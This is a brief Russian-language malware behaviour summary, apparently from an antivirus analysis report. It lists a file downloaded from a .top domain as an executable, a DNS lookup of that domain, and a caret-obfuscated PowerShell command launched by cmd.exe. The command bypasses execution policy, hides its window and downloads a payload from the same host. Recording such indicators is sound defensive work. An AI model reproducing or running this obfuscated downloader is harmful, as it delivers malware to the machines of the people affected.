Техническая информация
- http://dosehoop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Po^WE^r^s^h^ELL.ex^E -exEc^UTi^oNPoLIcY^ B^ypa^Ss^ -nOPr^of^iLE -wIn^D^OWSt^yle ^Hi^DDe^N (Ne^w^-oB^je^ct^ ^s^YS^teM.^ne^t.^w^e^b^ClIeNT).DO^W^nLoaDFile('http://dosehoop.top/read.php?...
- DNS ASK do###oop.top
- '<SYSTEM32>\cmd.exe' /C "Po^WE^r^s^h^ELL.ex^E -exEc^UTi^oNPoLIcY^ B^ypa^Ss^ -nOPr^of^iLE -wIn^D^OWSt^yle ^Hi^DDe^N (Ne^w^-oB^je^ct^ ^s^YS^teM.^ne^t.^w^e^b^ClIeNT).DO^W^nLoaDFile('http://dosehoop.top/read.php?...' (со скрытым окном)